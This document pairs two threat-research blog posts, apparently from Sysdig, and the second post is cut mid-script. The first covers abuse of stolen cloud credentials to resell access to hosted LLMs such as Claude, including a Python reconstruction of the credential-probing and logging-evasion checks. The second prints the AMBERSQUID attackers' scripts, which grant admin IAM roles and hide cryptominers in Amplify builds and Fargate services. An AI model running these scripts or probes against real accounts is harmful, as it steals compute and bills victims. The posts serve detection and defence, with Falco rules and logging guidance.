LLMjacking: Stolen Cloud Credentials Used in New AI Attack
Alessandro Brucato, Sysdig Threat Research Team | May 6, 2024
https://sysdig.com/blog/llmjacking-stolen-cloud-credentials-used-in-new-ai-attack/

The Sysdig Threat Research Team (TRT) recently observed a new attack, which we have named LLMjacking, that leveraged stolen cloud credentials to target ten cloud-hosted large language model (LLM) services. The credentials were obtained from a popular target: a system running a vulnerable version of Laravel (CVE-2021-3129). Attacks against LLM-based Artificial Intelligence (AI) systems have been discussed often, but mostly around prompt abuse and altering training data. In this case, the attackers intend to sell LLM access to other cybercriminals while the cloud account owner pays the bill.

Once initial access was obtained, the attackers exfiltrated cloud credentials and gained access to the cloud environment, where they attempted to access LLM models hosted by cloud providers; in this instance, Claude (v2/v3) models from Anthropic were targeted. If undiscovered, this type of attack could result in over $46,000 of LLM consumption costs per day for the victim.

Sysdig researchers discovered evidence of a reverse proxy for LLMs being used to provide access to the compromised accounts, suggesting a financial motivation.  However, another possible motivation is to extract LLM training data. 

Breadth of Targets

We were able to discover the tools that were generating the requests used to invoke the models during the attack. This revealed a broader script that was able to check credentials for ten different AI services in order to determine which were useful for their purposes. These services include:

  • AI21 Labs, Anthropic, AWS Bedrock, Azure, ElevenLabs, MakerSuite, Mistral, OpenAI, OpenRouter, and GCP Vertex AI

The attackers are looking to gain access to a large number of LLM models across different services. No legitimate LLM queries were actually run during the verification phase; instead, just enough was done to determine what the credentials were capable of, along with any quotas. Where possible, logging settings were also queried. This is done to avoid detection when using the compromised credentials to run their prompts.

Background

Hosted LLM Models

All major cloud providers, including Azure Machine Learning, GCP’s Vertex AI, and AWS Bedrock, now host large language model (LLM) services. These platforms provide developers with easy access to various popular models used in LLM-based AI. As illustrated in the screenshot below, the user interface is designed for simplicity, enabling developers to start building applications quickly.

These models, however, are not enabled by default. Instead, a request needs to be submitted to the cloud vendor in order to run them. For some models, it is an automatic approval; for others, like third-party models, a small form must be filled out. Once a request is made, the cloud vendor usually enables access pretty quickly. The requirement to make a request is often more of a speed bump for attackers rather than a blocker, and shouldn’t be considered a security mechanism. 

Cloud vendors have simplified the process of interacting with hosted cloud-based language models by using straightforward CLI commands. Once the necessary configurations and permissions are in place, you can easily engage with the model using a command similar to this:

aws bedrock-runtime invoke-model --model-id anthropic.claude-v2 --body '{"prompt": "\n\nHuman: story of two dogs\n\nAssistant:", "max_tokens_to_sample": 300}' --cli-binary-format raw-in-base64-out invoke-model-output.txt

LLM Reverse Proxy

The key checking code that verifies if credentials are able to use targeted LLMs also makes reference to another project: OAI Reverse Proxy. This open source project acts as a reverse proxy for LLM services. Using software such as this would allow an attacker to centrally manage access to multiple LLM accounts while not exposing the underlying credentials, or in this case, the underlying pool of compromised credentials. During the attack using the compromised cloud credentials, a user-agent that matches OAI Reverse Proxy was seen attempting to use LLM models.

[Image: OAI Reverse Proxy instance found running on the Internet]

The image above is an example of an OAI Reverse Proxy we found running on the Internet. There is no evidence that this instance is tied to this attack in any way, but it does show the kind of information it collects and displays. Of special note are the token counts (“tookens”), costs, and keys, which are potentially being logged.

[Image: OAI Reverse Proxy instance configured with multiple types of LLMs]

This example shows an OAI Reverse Proxy instance, which is set up to use multiple types of LLMs. There is no evidence that this instance is involved with the attack.

If the attackers were gathering an inventory of useful credentials and wanted to sell access to the available LLM models, a reverse proxy like this could allow them to monetize their efforts.


Technical Analysis

In this technical breakdown, we explore how the attackers navigated a cloud environment to carry out their intrusion. By employing seemingly legitimate API requests within the cloud environment, they cleverly tested the boundaries of their access without immediately triggering alarms. The example below demonstrates a strategic use of the InvokeModel API call logged by CloudTrail. Although the attackers issued a valid request, they intentionally set the max_tokens_to_sample parameter to -1. This unusual parameter, typically expected to trigger an error, instead served a dual purpose. It confirmed not only the existence of access to the LLMs but also that these services were active, as indicated by the resulting ValidationException. A different outcome, such as an AccessDenied error, would have suggested restricted access. This subtle probing reveals a calculated approach to uncover what actions their stolen credentials permitted within the cloud account.

InvokeModel

The InvokeModel call is logged by CloudTrail, and an example malicious event can be seen below. The attackers sent a legitimate request but set “max_tokens_to_sample” to -1. This invalid value causes the “ValidationException” error, but that is useful information for the attacker because it confirms the credentials have access to the LLMs and that they have been enabled. Otherwise, they would have received an “AccessDenied” error.

{
    "eventVersion": "1.09",
    "userIdentity": {
        "type": "IAMUser",
        "principalId": "[REDACTED]",
        "arn": "[REDACTED]",
        "accountId": "[REDACTED]",
        "accessKeyId": "[REDACTED]",
        "userName": "[REDACTED]"
    },
    "eventTime": "[REDACTED]",
    "eventSource": "bedrock.amazonaws.com",
    "eventName": "InvokeModel",
    "awsRegion": "us-east-1",
    "sourceIPAddress": "83.7.139.184",
    "userAgent": "Boto3/1.29.7 md/Botocore#1.32.7 ua/2.0 os/windows#10 md/arch#amd64 lang/python#3.12.1 md/pyimpl#CPython cfg/retry-mode#legacy Botocore/1.32.7",
    "errorCode": "ValidationException",
    "errorMessage": "max_tokens_to_sample: range: 1..1,000,000",
    "requestParameters": {
        "modelId": "anthropic.claude-v2"
    },
    "responseElements": null,
    "requestID": "d4dced7e-25c8-4e8e-a893-38c61e888d91",
    "eventID": "419e15ca-2097-4190-a233-678415ed9a4f",
    "readOnly": true,
    "eventType": "AwsApiCall",
    "managementEvent": true,
    "recipientAccountId": "[REDACTED]",
    "eventCategory": "Management",
    "tlsDetails": {
        "tlsVersion": "TLSv1.3",
        "cipherSuite": "TLS_AES_128_GCM_SHA256",
        "clientProvidedHostHeader": "bedrock-runtime.us-east-1.amazonaws.com"
    }
}

Example CloudTrail log
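The probing step can be sketched in a few lines of Python. This is our reconstruction of the technique, not the attackers' actual tooling; the helper names are ours, and the boto3 call is shown commented out since it requires live credentials:

```python
import json

def classify_probe_error(error_code: str) -> str:
    """Interpret the error returned by a deliberately invalid InvokeModel call."""
    if error_code == "ValidationException":
        # Request reached the model: credentials work and the model is enabled.
        return "model enabled"
    if error_code.startswith("AccessDenied"):
        # Credentials lack bedrock:InvokeModel, or the model is not enabled.
        return "access denied"
    return "unknown"

def probe_bedrock(client, model_id: str = "anthropic.claude-v2") -> str:
    """Send an invalid request (max_tokens_to_sample = -1) and classify the result."""
    try:
        client.invoke_model(
            modelId=model_id,
            body=json.dumps({"prompt": "\n\nHuman: hi\n\nAssistant:",
                             "max_tokens_to_sample": -1}),
        )
    except Exception as exc:  # botocore ClientError in practice
        code = getattr(exc, "response", {}).get("Error", {}).get("Code", "")
        return classify_probe_error(code)
    return "model enabled"

# Example usage (requires network access and AWS credentials):
# import boto3
# print(probe_bedrock(boto3.client("bedrock-runtime", region_name="us-east-1")))
```

Because no tokens are ever sampled, the probe costs the attacker nothing while still revealing whether the stolen key can reach an enabled model.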

AWS Bedrock is not supported in all regions, so the attackers called “InvokeModel” only in the supported regions. At this time, Bedrock is supported in us-east-1, us-west-2, ap-southeast-1, ap-northeast-1, eu-central-1, eu-west-3, and us-gov-west-1, as shown here. Different models are available depending on the region; here is the list of models supported by AWS Region.

GetModelInvocationLoggingConfiguration

Interestingly, the attackers showed interest in how the service was configured. This can be done by calling “GetModelInvocationLoggingConfiguration,” which returns the S3 and CloudWatch logging configuration if enabled. In our setup, we used both S3 and CloudWatch to gather as much data about the attack as possible.

{
    "loggingConfig": {
        "cloudWatchConfig": {
            "logGroupName": "[REDACTED]",
            "roleArn": "[REDACTED]",
            "largeDataDeliveryS3Config": {
                "bucketName": "[REDACTED]",
                "keyPrefix": "[REDACTED]"
            }
        },
        "s3Config": {
            "bucketName": "[REDACTED]",
            "keyPrefix": ""
        },
        "textDataDeliveryEnabled": true,
        "imageDataDeliveryEnabled": true,
        "embeddingDataDeliveryEnabled": true
    }
}

Example GetModelInvocationLoggingConfiguration response

Information about the prompts being run and their results is not stored in CloudTrail; additional configuration needs to be done to send that information to CloudWatch and S3. The attackers perform this check to hide the details of their activities from any detailed observations. OAI Reverse Proxy states it will not use any AWS key that has logging enabled, for the sake of “privacy.” This makes it impossible to inspect the prompts and responses if they are using the AWS Bedrock vector.
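The attacker-side decision (“is this key safe to use?”) amounts to checking whether the response above names any delivery destination. A minimal sketch of that check, using a helper we named ourselves against the (redacted) response structure shown earlier:

```python
def invocation_logging_enabled(response: dict) -> bool:
    """Return True if a GetModelInvocationLoggingConfiguration response shows
    any S3 or CloudWatch delivery destination configured."""
    cfg = response.get("loggingConfig") or {}
    return bool(cfg.get("s3Config") or cfg.get("cloudWatchConfig"))

# Mirrors the response shown above: both destinations configured.
logged = invocation_logging_enabled({
    "loggingConfig": {
        "cloudWatchConfig": {"logGroupName": "g", "roleArn": "r"},
        "s3Config": {"bucketName": "b", "keyPrefix": ""},
    }
})

# An account with no invocation logging returns an empty configuration.
unlogged = invocation_logging_enabled({"loggingConfig": {}})
```

A key that returns True here would be discarded by a logging-averse proxy, which is exactly why defenders benefit from leaving invocation logging on.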

Impact

In an LLMjacking attack, the damage comes in the form of increased costs to the victim. It shouldn’t be surprising to learn that using an LLM isn’t cheap and that cost can add up very quickly. Considering the worst-case scenario where an attacker abuses Anthropic Claude 2.x and reaches the quota limit in multiple regions, the cost to the victim can be over $46,000 per day.

According to the pricing and the initial quota limit for Claude 2:

  • 1000 input tokens cost $0.008, 1000 output tokens cost $0.024.
  • Max 500,000 input and output tokens can be processed per minute according to AWS Bedrock. We can consider the average cost between input and output tokens, which is $0.016 for 1000 tokens.

Leading to the total cost: (500K tokens/1000 * $0.016) * 60 minutes * 24 hours * 4 regions = $46,080 / day
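The arithmetic above can be reproduced directly from the cited rates and quota:

```python
# Claude 2 pricing: $0.008 per 1,000 input tokens, $0.024 per 1,000 output tokens.
avg_cost_per_1k = (0.008 + 0.024) / 2   # $0.016, assuming an even input/output mix
tokens_per_minute = 500_000             # AWS Bedrock initial quota per region
regions = 4                             # regions abused in parallel

cost_per_day = (tokens_per_minute / 1000) * avg_cost_per_1k * 60 * 24 * regions
print(f"${cost_per_day:,.0f} / day")    # $46,080 / day
```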

By maximizing the quota limits, attackers can also block the compromised organization from using models legitimately, disrupting business operations.

Detection

The ability to detect and respond swiftly to potential threats can make all the difference in maintaining a robust defense. Drawing insights from recent feedback and industry best practices, we’ve distilled key strategies to elevate your detection capabilities:

  • Cloud Logs Detections: Tools like Falco, Sysdig Secure, and CloudWatch Alerts are indispensable allies. Organizations can proactively identify suspicious behavior by monitoring runtime activity and analyzing cloud logs, including reconnaissance tactics such as those employed within AWS Bedrock. 
  • Detailed Logging: Comprehensive logging, including verbose logging, offers invaluable visibility into the inner workings of your cloud environment. Verbose information about model invocations and other critical activities gives organizations a nuanced understanding of activity in their cloud environments.

Cloud Log Detections

Monitoring cloud logs can reveal suspicious or unauthorized activity. Using Falco or Sysdig Secure, the reconnaissance methods used during the attack can be detected, and a response can be started. For Sysdig Secure customers, this rule can be found in the Sysdig AWS Notable Events policy.

Falco rule:

- rule: Bedrock Model Recon Activity
  desc: Detect reconnaissance attempts to check if Amazon Bedrock is enabled, based on the error code. Attackers can leverage this to discover the status of Bedrock, and then abuse it if enabled.
  condition: jevt.value[/eventSource]="bedrock.amazonaws.com" and jevt.value[/eventName]="InvokeModel" and jevt.value[/errorCode]="ValidationException"
  output: A reconnaissance attempt on Amazon Bedrock has been made (requesting user=%aws.user, requesting IP=%aws.sourceIP, AWS region=%aws.region, arn=%jevt.value[/userIdentity/arn], userAgent=%jevt.value[/userAgent], modelId=%jevt.value[/requestParameters/modelId])
  priority: WARNING

In addition, CloudWatch alerts can be configured to handle suspicious behaviors. Several runtime metrics for Bedrock can be monitored to trigger alerts.
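As one example, Bedrock publishes runtime metrics in the AWS/Bedrock CloudWatch namespace (such as Invocations), which can back a volume-spike alarm. The alarm name and threshold below are illustrative placeholders, not values from the attack:

```python
# Sketch: alarm on unusually high Bedrock invocation volume.
# Namespace and metric are AWS-published; name and threshold are placeholders.
alarm = {
    "AlarmName": "bedrock-invocation-spike",   # placeholder name
    "Namespace": "AWS/Bedrock",
    "MetricName": "Invocations",
    "Statistic": "Sum",
    "Period": 300,                             # evaluate 5-minute windows
    "EvaluationPeriods": 1,
    "Threshold": 1000,                         # tune to your own baseline
    "ComparisonOperator": "GreaterThanThreshold",
}

# To create it (requires AWS credentials):
# import boto3
# boto3.client("cloudwatch").put_metric_alarm(**alarm)
```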

Detailed Logging

Monitoring your organization’s use of large language model (LLM) services is crucial, and various cloud vendors provide facilities to streamline this process. This typically involves setting up mechanisms to log and store data about model invocations.

For AWS Bedrock specifically, users can leverage CloudWatch and S3 for enhanced monitoring capabilities. CloudWatch can be set up by creating a log group and assigning a role with the necessary permissions. Similarly, to log to S3, a designated bucket is required as a destination. It is important to note that the CloudTrail log of the InvokeModel command does not capture details about the prompt input and output. However, Bedrock settings allow for easy activation of model invocation logging. Additionally, for model input or output data larger than 100 KB or in binary format, users must explicitly specify an S3 destination to handle large data delivery. This includes input and output images, which are stored in the logs as Base64 strings. Such comprehensive logging mechanisms ensure that all aspects of model usage are monitored and archived for further analysis and compliance.
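Enabling this programmatically is a single API call. The sketch below mirrors the configuration structure returned by GetModelInvocationLoggingConfiguration earlier; the bucket, log group, and role names are placeholders you would replace with your own:

```python
# Sketch: enable Bedrock model invocation logging to CloudWatch and S3.
# All resource names/ARNs below are illustrative placeholders.
logging_config = {
    "cloudWatchConfig": {
        "logGroupName": "bedrock-invocations",                      # placeholder
        "roleArn": "arn:aws:iam::123456789012:role/bedrock-logs",   # placeholder
        "largeDataDeliveryS3Config": {
            "bucketName": "bedrock-large-payloads",                 # placeholder
            "keyPrefix": "large/",
        },
    },
    "s3Config": {"bucketName": "bedrock-invocation-logs", "keyPrefix": ""},
    "textDataDeliveryEnabled": True,
    "imageDataDeliveryEnabled": True,
    "embeddingDataDeliveryEnabled": True,
}

# To apply (requires credentials; note the control-plane client is "bedrock",
# not "bedrock-runtime"):
# import boto3
# boto3.client("bedrock").put_model_invocation_logging_configuration(
#     loggingConfig=logging_config)
```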

The logs contain additional information about the tokens processed, as shown in the following example:

{
    "schemaType": "ModelInvocationLog",
    "schemaVersion": "1.0",
    "timestamp": "[REDACTED]",
    "accountId": "[REDACTED]",
    "identity": {
        "arn": "[REDACTED]"
    },
    "region": "us-east-1",
    "requestId": "bea9d003-f7df-4558-8823-367349de75f2",
    "operation": "InvokeModel",
    "modelId": "anthropic.claude-v2",
    "input": {
        "inputContentType": "application/json",
        "inputBodyJson": {
            "prompt": "\n\nHuman: Write a story of a young wizard\n\nAssistant:",
            "max_tokens_to_sample": 300
        },
        "inputTokenCount": 16
    },
    "output": {
        "outputContentType": "application/json",
        "outputBodyJson": {
            "completion": " Here is a story about a young wizard:\n\nMartin was an ordinary boy living in a small village. He helped his parents around their modest farm, tending to the animals and working in the fields. [...] Martin's favorite subject was transfiguration, the art of transforming objects from one thing to another. He mastered the subject quickly, amazing his professors by turning mice into goblets and stones into fluttering birds.\n\nMartin",
            "stop_reason": "max_tokens",
            "stop": null
        },
        "outputTokenCount": 300
    }
}

Example S3 log

Recommendations

This attack could have been prevented in a number of ways, including:

  • Vulnerability management to prevent initial access.
  • Secrets management to ensure credentials are not stored in the clear where they can be stolen.
  • CSPM/CIEM to ensure the abused account had the least amount of permissions it needed.

As highlighted by recent research, cloud vendors offer a range of tools and best practices designed to mitigate the risks of cloud attacks. These tools help organizations build and maintain a secure cloud environment from the outset.

For instance, AWS provides several robust security measures. The AWS Security Reference Architecture outlines best practices for securely constructing your cloud environment. Additionally, AWS recommends using Service Control Policies (SCP) to centrally manage permissions, which helps minimize the risk associated with over-permissioned accounts that could potentially be abused. These guidelines and tools are part of AWS’s commitment to enhancing security and providing customers with the resources to protect their cloud infrastructure effectively. Other cloud vendors offer similar frameworks and tools, ensuring that users have access to essential security measures to safeguard their data and services regardless of the platform.

Conclusion

Stolen cloud and SaaS credentials continue to be a common attack vector. This trend will only increase in popularity as attackers learn all of the ways they can leverage their new access for financial gain. The use of LLM services can be expensive, depending on the model and the amount of tokens being fed to it. Normally, this would cause a developer to try and be efficient — sadly, attackers do not have the same incentive. Detection and response is critical to deal with any issues quickly. 

IoCs

IP Addresses

83.7.139.184

83.7.157.76

73.105.135.228

83.7.135.97

AWS’s Hidden Threat: AMBERSQUID Cloud-Native Cryptojacking Operation
Alessandro Brucato, Sysdig Threat Research Team | September 18, 2023
https://sysdig.com/blog/ambersquid/

The Sysdig Threat Research Team (TRT) has uncovered a novel cloud-native cryptojacking operation which they’ve named AMBERSQUID. This operation leverages AWS services not commonly used by attackers, such as AWS Amplify, AWS Fargate, and Amazon SageMaker. The uncommon nature of these services means that they are often overlooked from a security perspective, and the AMBERSQUID operation can cost victims more than $10,000/day.

The AMBERSQUID operation was able to exploit cloud services without triggering the AWS requirement for approval of more resources, as would be the case if they only spammed EC2 instances. Targeting multiple services also complicates incident response, since it requires finding and killing all miners in each exploited service.

AMBERSQUID

We discovered AMBERSQUID by performing an analysis of over 1.7M Linux images in order to understand what kind of malicious payloads are hiding in the container images on Docker Hub.

This dangerous container image didn’t raise any alarms during static scanning for known indicators or malicious binaries. It was only when the container was run that its cross-service cryptojacking activities became obvious. This is consistent with the findings of our 2023 Cloud Threat Report, in which we noted that 10% of malicious images are missed by static scanning alone.

With medium confidence, we attribute this operation to Indonesian attackers based on the use of Indonesian language in scripts and usernames. We also regularly see freejacking and cryptojacking attacks as a lucrative source of income for Indonesian attackers due to their low cost of living.

Technical Analysis

Docker Hub

The original container that initiated our investigation was found on Docker Hub, but the scope quickly expanded to include a number of accounts. Most of these accounts started with very basic container images running a cryptominer. However, they eventually switched over to the AWS-specific services described in this research.

Timeline

It is interesting to note that the first account was created in May 2022, and its development continued through August. The attackers continued pushing cryptominer images with different accounts until March 2023, when they created a GitHub account. Before creating their own repositories, the attackers downloaded miners from popular GitHub repositories and imported them into the layers of the Docker images; moving to their own repositories made the operation a bit more evasive. Their repositories don’t have any source code (yet), but they do provide the miners inside archives downloadable as releases. Those binaries are usually called “test,” packed with UPX and malformed so they cannot be easily unpacked.


Below is the list of known Docker Hub users related to this operation. Some of the accounts seem to have been abandoned, while others continue to be active.

https://hub.docker.com/u/delbidaluan
https://hub.docker.com/u/tegarhuta
https://hub.docker.com/u/rizal91
https://hub.docker.com/u/krisyantii20
https://hub.docker.com/u/avriliahasanah
https://hub.docker.com/u/buenosjiji662
https://hub.docker.com/u/buenosjiji
https://hub.docker.com/u/dellaagustin582
https://hub.docker.com/u/jotishoop
https://hub.docker.com/u/nainasachie
https://hub.docker.com/u/rahmadabdu0
https://hub.docker.com/u/robinrobby754

Malicious images from Docker Hub

If we dig deeper into delbidaluan/epicx, we discover a GitHub account that the attacker uses to store the Amplify application source code and the mining scripts mentioned above. They have different versions of their code to prevent being tracked by the GitHub search engine.


For instance, before creating their GitHub account, the attacker used the cryptominer binaries without any obfuscation.

We have deduced that the images ending with “x” download the miners from the attackers’ repository releases and run them when launched, which can be seen in the layers. The epicx image, in particular, has over 100,000 downloads.


The images without the final “x” run the scripts targeting AWS.

AWS Artifacts

Let’s begin with the artifact analysis using the container image delbidaluan/epic. The ENTRYPOINT of the Docker image is entrypoint.sh. All of the different images have the same format but can execute different scripts. In this case, the execution starts with the following:

#!/bin/bash

aws --version

aws configure set aws_access_key_id $ACCESS
aws configure set aws_secret_access_key $SECRET
aws configure set default.output text

git config --global user.name "GeeksforGeeks"
git config --global user.email "GFGexample@gmail.orgg"

They set up the AWS credentials with the environment variables or by passing them when deploying the image. Then, the Git user and email are taken from the GeeksforGeeks example. The username exists on GitHub but with no activity.

The entrypoint.sh proceeds with the following scripts:

./amplify-role.sh
./repo.sh
./jalan.sh
./update.sh
./ecs.sh
./ulang.sh

Let’s explain each artifact and service the attacker is using to accomplish their cryptojacking operation.

Roles and permissions

The first script executed by the container, amplify-role.sh, creates the “AWSCodeCommit-Role” role. This new role is one of several used by the attacker throughout the operation as they add additional permissions for other AWS services. The first service, which is given access, is AWS Amplify. We will discuss the specifics around Amplify later in the article.

aws iam create-role --role-name AWSCodeCommit-Role --assume-role-policy-document file://amplify-role.json

Where amplify-role.json is:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "Service": "amplify.amazonaws.com"
            },
            "Action": "sts:AssumeRole"
        }
    ]
}

Then, it attaches the full access policies of CodeCommit, CloudWatch, and Amplify to that role.

aws iam attach-role-policy --role-name AWSCodeCommit-Role --policy-arn arn:aws:iam::aws:policy/AWSCodeCommitFullAccess
aws iam attach-role-policy --role-name AWSCodeCommit-Role --policy-arn arn:aws:iam::aws:policy/CloudWatchFullAccess
aws iam attach-role-policy --role-name AWSCodeCommit-Role --policy-arn arn:aws:iam::aws:policy/AdministratorAccess-Amplify

Some inline policies are added as well:

aws iam put-role-policy --role-name AWSCodeCommit-Role --policy-name amed --policy-document file://amed.json
aws iam put-role-policy --role-name AWSCodeCommit-Role --policy-name ampad --policy-document file://ampad.json

These policies grant full privileges of Amplify and amplifybackend services to all resources.

Finally, amplify-role.sh creates another role, “sugo-role,” with full access to SageMaker, as shown below:

aws iam create-role --role-name sugo-role --assume-role-policy-document file://sugo.json
aws iam attach-role-policy --role-name sugo-role --policy-arn arn:aws:iam::aws:policy/AmazonSageMakerFullAccess

Where sugo.json is:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "Service": "sagemaker.amazonaws.com"
            },
            "Action": "sts:AssumeRole"
        }
    ]
}

In the same way, the ecs.sh script starts by creating the role “ecsTaskExecutionRole,” with full access to ECS as well as administrative privileges.

aws iam create-role --role-name ecsTaskExecutionRole --assume-role-policy-document file://ecsTaskExecutionRole.json
aws iam attach-role-policy --role-name ecsTaskExecutionRole --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
aws iam attach-role-policy --role-name ecsTaskExecutionRole --policy-arn arn:aws:iam::aws:policy/AmazonECS_FullAccess
aws iam attach-role-policy --role-name ecsTaskExecutionRole --policy-arn arn:aws:iam::aws:policy/service-role/AmazonECSTaskExecutionRolePolicy

[...]

Where ecsTaskExecutionRole.json is:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "",
      "Effect": "Allow",
      "Principal": {
        "Service": "ecs-tasks.amazonaws.com"
      },
      "Action": "sts:AssumeRole"
    }
  ]
}

CodeCommit

AWS CodeCommit is a secure, highly scalable, fully-managed source control service that hosts private Git repositories. The attackers used this service to generate the private repository which they then used in different services as a source. This allows their operation to stay fully contained within AWS.

The repo.sh script creates a CodeCommit repository named “test” in every region.

aws configure set region ca-central-1
aws codecommit create-repository --repository-name test

./code.sh

echo "selesai region ca-central-1"

Interestingly, “selesai” means “completed” in Indonesian.

Right after creating each repository, it executes code.sh, which pushes the source code of an Amplify app to the remote repository via Git.

cd amplify-app
rm -rf .git
git init
git add .
git commit -m "web app"
git branch -m master
git status

git config --global credential.helper '!aws codecommit credential-helper $@'
git config --global credential.UseHttpPath true

git remote remove codecommit
REPO=$(aws codecommit get-repository --repository-name test --query 'repositoryMetadata.cloneUrlHttp'| tr -d '"' 2> /dev/null)
git remote add codecommit $REPO
git push codecommit master --force

Amplify

AWS Amplify is a development platform that allows developers to build and deploy scalable web and mobile applications. It provides a framework to integrate the app with multiple other AWS services, such as AWS Cognito for authentication, AWS AppSync for APIs, and AWS S3 for storage. Most importantly, Amplify provides the attacker access to compute resources.

Once the attackers created the private repositories, the next script jalan.sh executes another script, sup0.sh, in each region.

aws configure set region us-east-1
./sup0.sh
echo "selesai region us-east-1"

The sup0.sh script creates five Amplify web apps from the previously created repositories. The “amplify-app” directory present in code.sh includes the files needed to run their miners using Amplify, as some services do require file backing as seen here.

What follows is amplify.yml:

version: 1
frontend:
  phases:
    build:
      commands:
        - python3 index.py
        - ./time

  artifacts:
    baseDirectory: /
    files:
      - '**/*'

While this is the content of index.py:

import json
import datetime
import os
import time

os.system("./start")

def handler(event, context):
    data = {
        'output': 'Hello World',
        'timestamp': datetime.datetime.utcnow().isoformat()
    }
    return {'statusCode': 200,
            'body': json.dumps(data),
            'headers': {'Content-Type': 'application/json'}}

It runs the following start script, which executes the cryptominer:

nohup bash -c 'for i in {1..99999}; do ./test --disable-gpu --algorithm randomepic --pool 74.50.74.27:4416 --wallet rizal91#amplify-$(echo $(date +%H)) --password kiki311093m=solo -t $(nproc --all) --tls false --cpu-threads-intensity 1 --keep-alive true --log-file meta1.log; done' > program.out 2>&1 &

The “test” binary is a cryptominer, packed with UPX and malformed in order to make analysis more difficult; it is also undetected by VirusTotal. Telemetry results show that it was previously uploaded as “SRBMiner-MULTI,” which is confirmed by the documentation related to Epic Cash mining:

./SRBMiner-MULTI --multi-algorithm-job-mode 1 --disable-gpu --algorithm randomepic --pool lt.epicmine.io:3334 --tls true --wallet your_username.worker_name --password your_passwordm=pool --keepalive true

We can assume that the attackers do this to avoid any downloads from outside the account’s own repository, thus avoiding possible alerts.

The other script they run in amplify.yml, named time, is used to make the build last as long as possible while the miner process is running:

for i in {1..6500000}
do
pgrep -x test;
sleep 3;
done

The attackers use their scripts to create several Amplify web apps to be deployed with Amplify Hosting. In the configuration file for the build settings, they inserted the commands to run a miner that is executed during the build phase of the app. The following code is part of sup0.sh script:

REPO=$(aws codecommit get-repository --repository-name test --query 'repositoryMetadata.cloneUrlHttp'| tr -d '"' 2> /dev/null)
IAM=$(aws iam get-role --role-name AWSCodeCommit-Role --query 'Role.Arn'| tr -d '"' 2> /dev/null)

for i in {1..5}
do
aws amplify create-app --name task$i --repository $REPO  --platform WEB  --iam-service-role-arn $IAM --environment-variables '{"_BUILD_TIMEOUT":"480","BUILD_ENV":"prod"}' --enable-branch-auto-build  --enable-branch-auto-deletion  --no-enable-basic-auth \
--build-spec "
version: 1
frontend:
  phases:
    build:
      commands:
        - timeout 280000 python3 index.py

  artifacts:
    baseDirectory: /
    files:
      - '**/*'

" \
--enable-auto-branch-creation --auto-branch-creation-patterns '["*","*/**"]' --auto-branch-creation-config '{"stage": "PRODUCTION",  "enableAutoBuild": true,  "environmentVariables": {" ": " "},"enableBasicAuth": false, "enablePullRequestPreview":false}'

The commands are then executed inside build instances: EC2 instances provided by AWS used to build the application.

This is the first time we have discovered attackers abusing AWS Amplify for cryptojacking.

It is also interesting to see how they enable auto-build, so that once the applications are created, the repo code is updated with the update.sh script so that they are deployed again.

Additionally, in another image (tegarhuta/ami) from a user who is part of the same pool, we discovered instructions for creating an Amplify app in the same folder where the cryptomining scripts were stored. One of the URLs is an Amplify app that appears to be running at the time of writing.

The site was hosted at `https://master[.]d19tgz4vpyd5[.]amplifyapp[.]com/`.

Elastic Container Service (ECS) / Fargate

The next script, ecs.sh, is used for cryptojacking in the AWS ECS service. Amazon ECS is an orchestration service used to manage and deploy containers. Tasks and services are grouped in ECS clusters, which can run on EC2 instances, AWS Fargate (serverless), or on-premises virtual machines.

This script creates the “ecsTaskExecutionRole” role that can be assumed from the ECS tasks service. Then, it attaches the “AdministratorAccess”, “AmazonECS_FullAccess,” and “AmazonECSTaskExecutionRolePolicy” policies to it. This is the same process described above in the IAM section.

After that, it writes an ECS task definition where the image used to start the container is delbidaluan/epicx, a miner image belonging to the same Docker Hub user. The resources are set so that the container has 2 vCPU and 4 GB of memory. It is also configured to run on Fargate by setting “requiresCompatibilities”: [“FARGATE”].
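
Based on the settings described, the attackers' task.json is likely shaped roughly as follows. This is a reconstruction from the observed parameters, not the verbatim file; the account ID in the role ARN is a placeholder, and Fargate requires the awsvpc network mode with CPU/memory expressed as strings:

```json
{
  "family": "test",
  "requiresCompatibilities": ["FARGATE"],
  "networkMode": "awsvpc",
  "cpu": "2048",
  "memory": "4096",
  "executionRoleArn": "arn:aws:iam::123456789012:role/ecsTaskExecutionRole",
  "containerDefinitions": [
    {
      "name": "test",
      "image": "delbidaluan/epicx",
      "essential": true
    }
  ]
}
```

Registering it is then a one-liner, matching the call in the script below: `aws ecs register-task-definition --family test --cli-input-json file://task.json`.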

Then, for each region:

  • It creates an ECS cluster in Fargate
  • It registers the previous task definition
  • It queries the quota of Fargate On-Demand vCPU available and creates an ECS service according to that result:
    • If the quota equals 30.0, the “desiredCount” of the service is set to 30.
    • Otherwise, the “desiredCount” of the service is set to 6.
aws configure set region us-east-1

aws ecs create-cluster \
--cluster-name test \
--capacity-providers FARGATE FARGATE_SPOT \
--default-capacity-provider-strategy capacityProvider=FARGATE,weight=1 capacityProvider=FARGATE_SPOT,weight=1
sleep 10s
aws ecs create-cluster \
--cluster-name test \
--capacity-providers FARGATE FARGATE_SPOT \
--default-capacity-provider-strategy capacityProvider=FARGATE,weight=1 capacityProvider=FARGATE_SPOT,weight=1

aws ecs register-task-definition --family test --cli-input-json file://task.json

LIFAR=$(aws service-quotas get-service-quota --service-code fargate --quota-code L-3032A538 --query 'Quota.Value')
if [ $LIFAR = "30.0" ];
then
COUNT=30
VPC=$(aws ec2 describe-vpcs --query 'Vpcs[0].VpcId'| tr -d '"' 2> /dev/null)
SGROUP=$(aws ec2 describe-security-groups --filters "Name=vpc-id,Values=$VPC" --query 'SecurityGroups[0].GroupId' | tr -d '"' 2> /dev/null)
SUBNET=$(aws ec2 describe-subnets --query 'Subnets[0].SubnetId' | tr -d '"' 2> /dev/null)
SUBNET1=$(aws ec2 describe-subnets --query 'Subnets[1].SubnetId' | tr -d '"' 2> /dev/null)
aws ecs create-service --cluster test --service-name test --task-definition test:1 --desired-count $COUNT --capacity-provider-strategy capacityProvider=FARGATE,weight=1 capacityProvider=FARGATE_SPOT,weight=1 --platform-version LATEST --network-configuration "awsvpcConfiguration={subnets=[$SUBNET,$SUBNET1],securityGroups=[$SGROUP],assignPublicIp=ENABLED}"

else
COUNT=6
VPC=$(aws ec2 describe-vpcs --query 'Vpcs[0].VpcId'| tr -d '"' 2> /dev/null)
